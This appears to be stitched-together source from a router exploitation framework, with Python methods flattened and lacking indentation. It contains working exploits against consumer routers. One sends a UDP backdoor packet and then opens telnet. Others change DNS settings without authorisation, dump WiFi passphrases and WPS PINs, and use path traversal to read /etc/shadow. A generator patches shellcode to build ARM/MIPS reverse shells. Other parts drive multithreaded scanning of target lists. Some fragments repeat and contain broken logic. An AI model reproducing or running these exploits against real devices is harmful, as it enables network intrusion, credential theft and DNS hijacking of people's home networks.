def check(self, host, port, timeout):
utils.print_info('Use username: {}, password: {}'.format(self.username, self.password))
if self.input_to_continue():
if self.login(host, port, timeout):
url = self.check_url.format(host, port)
resp, err = self.http_get(self.s, url, timeout)
if err:
self.print_requests_err(host, port, err)
self.print_check_result(False, host)
else:
textarea_1_match = re.compile(r'textarea cols="" rows="" class="textarea_1"', re.S).search(resp.text)
if textarea_1_match:
self.print_check_result(True, host)
return True
else:
utils.print_warning('Device is busy, please wait')
return False
else:
utils.print_failed('Login failed')
self.print_check_result(False, host)
return False
else:
self.set_credits()
return self.check(host, port, timeout)
return False
def run(self, host, port, timeout):
# TODO NOT TESTING
if self.primary_dns == '':
p_dns = input('Please input the PRIMARY DNS: ')
if utils.valid_host(p_dns):
self.primary_dns = p_dns
else:
self.run(host, port, timeout)
if self.second_dns == '':
s_dns = input('Please input the SECOND DNS: ')
if utils.valid_host(s_dns):
self.second_dns = s_dns
else:
self.run(host, port, timeout)
utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(self.primary_dns, self.second_dns))
if self.input_to_continue():
url = 'http://{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}'\
.format(host, port, self.primary_dns, self.second_dns)
resp, err = self.http_post(self.s, url, timeout, None)
if err:
self.print_requests_err(host, port, err)
return
if resp.status_code == 200:
utils.print_success("DNS settings has been changed")
else:
utils.print_failed("Could not change DNS settings")
else:
self.primary_dns = ''
self.second_dns = ''
def run(self, host, port, timeout):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
utils.print_info("Sending backdoor packet...")
response = ""
try:
sock.sendto("HELODBG", (host, 39889))
response = sock.recv(1024)
except Exception as e:
pass
sock.close()
if "Hello" in response:
utils.print_success("Target seems to vulnerable")
utils.print_info(
"Trying to connect to the telnet service {}:{}".format(
host, 23))
try:
tn = telnetlib.Telnet(host, 23)
tn.interact()
except Exception as e:
utils.print_failed(
"Exploit failed - could not connect to the telnet service")
else:
utils.print_failed(
"Exploit failed - target seems to be not vulnerable")
def shell(exploit, architecture="", method="", **params):
while 1:
cmd = input("cmd > ")
if cmd in ["quit", "exit"]:
return
c = cmd.split()
if len(c) and c[0] == "reverse_tcp":
if len(c) == 3:
lhost = c[1]
lport = c[2]
revshell = ReverseShell(exploit, architecture, lhost, lport)
if method == "wget":
revshell.wget(binary=params['binary'],
location=params['location'])
elif method == "echo":
revshell.echo(binary=params['binary'],
location=params['location'])
elif method == "awk":
revshell.awk(binary=params['binary'])
elif method == "netcat":
revshell.netcat(binary=params['binary'],
shell=params['shell'])
else:
print_failed("Reverse shell is not available")
else:
print_failed("reverse_tcp <reverse ip> <port>")
else:
print_info(exploit.execute(cmd))
def do_check(self, arg):
utils.print_info('checking if module loaded')
if not self.check_module_loaded():
utils.print_failed(
'checking module failed\n'
'Please make sure you have already choose one module')
return
utils.print_info('checking targets info')
if not self.check_target_arg():
utils.print_failed('checking targets info failed\n'
'Please make sure you input info target info')
return
else:
utils.print_success('passing checking...')
target = self.task.get_current()
if self.module.check(target.host, target.port,
self.task.get_timeout()):
module_name = inspect.getmodule(self.module).__name__[16:]
exploits = target.affective_exploit
if not exploits:
a_exploit = [module_name]
else:
if module_name not in exploits:
a_exploit = exploits.append(module_name)
else:
a_exploit = exploits
self.task.set_current(
ExploitTarget(host=target.host,
port=target.port,
brand=target.brand,
alternative_exploit=target.alternative_exploit,
affective_exploit=a_exploit))
def run(self, host, port, timeout):
# TODO NOT TESTING
if self.info is None:
url = "http://{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase," \
"wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list," \
"get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode," \
"get_wps_enable,get_wps_current_time&_=1458458152703" \
.format(host, port)
resp, err = self.http_get(self.s, url, timeout)
if err is None:
if resp.status_code == 200:
try:
self.info = json.loads(resp.text)
except ValueError:
pass
if self.info and len(self.info):
utils.print_success('Exploit success')
t = prettytable.PrettyTable()
t.add_column('Key', list(self.info.keys()))
t.add_column('Value', list(self.info.values()))
utils.print_info(t)
utils.logger.send((host, port, t))
utils.print_failed('Exploit failed')
def run(self, host, port, timeout):
filename = input('Please input filename(default: /etc/shadow): ')
if filename == '':
filename = '/etc/shadow'
url = "{}:{}/cgi-bin/webproc".format(host, port)
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../..{}".format(filename),
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "******",
"%3Apassword": "******",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response, err = self.http_post(self.s, url, timeout, data)
if err:
self.print_requests_err(host, port, err)
return
if response.status_code == 200:
utils.print_success("Exploit success")
utils.print_info("File: {}".format(filename))
utils.print_info(response.text)
else:
utils.print_failed("Exploit failed")
def run(self, host, port, timeout):
# TODO NOT TESTING
if self.primary_dns == '':
p_dns = input('Please input the PRIMARY DNS: ')
if utils.valid_host(p_dns):
self.primary_dns = p_dns
else:
self.run(host, port, timeout)
if self.second_dns == '':
s_dns = input('Please input the SECOND DNS: ')
if utils.valid_host(s_dns):
self.second_dns = s_dns
else:
self.run(host, port, timeout)
utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(
self.primary_dns, self.second_dns))
if self.input_to_continue():
url = "http://{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&" \
"dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" \
.format(host, port, self.primary_dns, self.second_dns)
resp, err = self.http_post(self.s, url, timeout, None)
if err:
self.print_requests_err(host, port, err)
return
if resp.status_code == 200:
utils.print_success("DNS settings has been changed")
else:
utils.print_failed("Could not change DNS settings")
else:
self.primary_dns = ''
self.second_dns = ''
def do_use(self, module_path, *arg):
module_path = utils.pythonize_path(module_path)
module_path = '.'.join(('modules', module_path, '__interpreter__'))
try:
utils.import_module(module_path, 'Interpreter')()
except ModuleImportException as err:
utils.print_failed(err)
def do_load(self, scanner_name):
module_path = utils.pythonize_path(scanner_name)
module_path = '.'.join(('modules.scanner', module_path))
try:
self.module = utils.import_module(module_path, 'Scanner')
except ModuleImportException as err:
utils.print_failed(err)
else:
self.change_prompt(self.module)
def last(self, args):
if len(self.__targets) == 0:
utils.print_failed('no targets list')
return
if self.__current > 0:
self.__current -= 1
utils.print_info(
'move to ' + utils.Color.GREEN + str(self.__current) + utils.Color.ENDC + ': ' + self.__targets[
self.__current].host)
else:
utils.print_failed('targets list move to the first')
def do_writeresult(self, *args):
if self.task.get_output():
fd = open(self.task.get_output(), 'w')
for result in self.last_result:
utils.print_info("{}:{},{},{},{},{}".format(
result.host, result.port, result.brand, result.module,
result.extra, result.exploit),
file=fd)
fd.close()
else:
utils.print_failed('no output file given')
def run(self, host, port, timeout):
# TODO This script works but the effect is poor
utils.print_info('Use username: {}, password: {}'.format(self.username, self.password))
if self.input_to_continue():
if self.login(host, port, timeout):
resp, err = self.http_get(self.s, self.check_url.format(host, port), timeout)
if err:
self.print_requests_err(host, port, err)
else:
self.command_loop(host, port, timeout)
else:
utils.print_failed('Login failed')
else:
self.set_credits()
self.run()
def do_run(self, arg):
utils.print_info('checking if module loaded')
if not self.check_module_loaded():
utils.print_failed(
'checking module failed\n'
'Please make sure you have already choose one module')
return
utils.print_info('checking targets info')
if not self.check_target_arg():
utils.print_failed('checking targets info failed\n'
'Please make sure you input info target info')
return
else:
utils.print_success('passing checking...')
target = self.task.get_current()
self.module.run(target.host, target.port, self.task.get_timeout())
def generate_binary(self, lhost, lport):
print_warning("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[
0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[
0xe6:0xf0] + ip[2:] + self.mipsel[
0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[
0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[
2:] + self.mips[0xf8:]
else:
print_failed("Platform not supported")
def do_run(self, arg):
scan_result_queue.empty()
self.last_result = []
utils.print_info('checking if module loaded')
if not self.check_module_loaded():
utils.print_failed(
'checking module failed\n'
'Please make sure you have already choose one module')
return
utils.print_info('checking targets info')
if not self.check_task_arg():
utils.print_failed('checking targets info failed\n'
'Please make sure you input info target info')
return
else:
utils.print_success('passing checking...')
with threads.ThreadPoolExecutor(self.task.get_threads()) as executor:
for target in self.task.get_targets():
executor.submit(self.target_func, target)
utils.print_success('all tasks finished...')
while True:
try:
result = scan_result_queue.get(block=False)
self.last_result.append(result)
except Exception as e:
print(e)
break
if self.task.get_output() != '':
fd = open(self.task.get_output(), 'w')
for result in self.last_result:
utils.print_info("{}:{},{},{},{},{}".format(
result.host, result.port, result.brand, result.module,
result.extra, result.exploit),
file=fd)
fd.close()
def do_task(self, args):
try:
sub_opt, arg = args.split(' ')[0], args.split(' ')[1:]
if sub_opt not in self.sub_opt['task']:
raise BadHostInfoException()
except IndexError:
utils.print_failed(
"Error during setting '{}'\n"
"Not enough arguments\n"
"Use <tab> key multiple times for completion.".format(args))
return
except BadHostInfoException as err:
utils.print_failed(
"Error during setting '{}'\n"
"Use <tab> key multiple times for completion.".format(args))
return
try:
self.task.__getattribute__(sub_opt)(arg)
except (BadHostInfoException, TypeError) as err:
utils.print_failed("Error during setting '{}'\n"
"{}.\n"
"Please check the arguments input.".format(
sub_opt, err))
def default(self, line):
utils.print_failed(
'*** Unknown command: {command}'.format(command=line))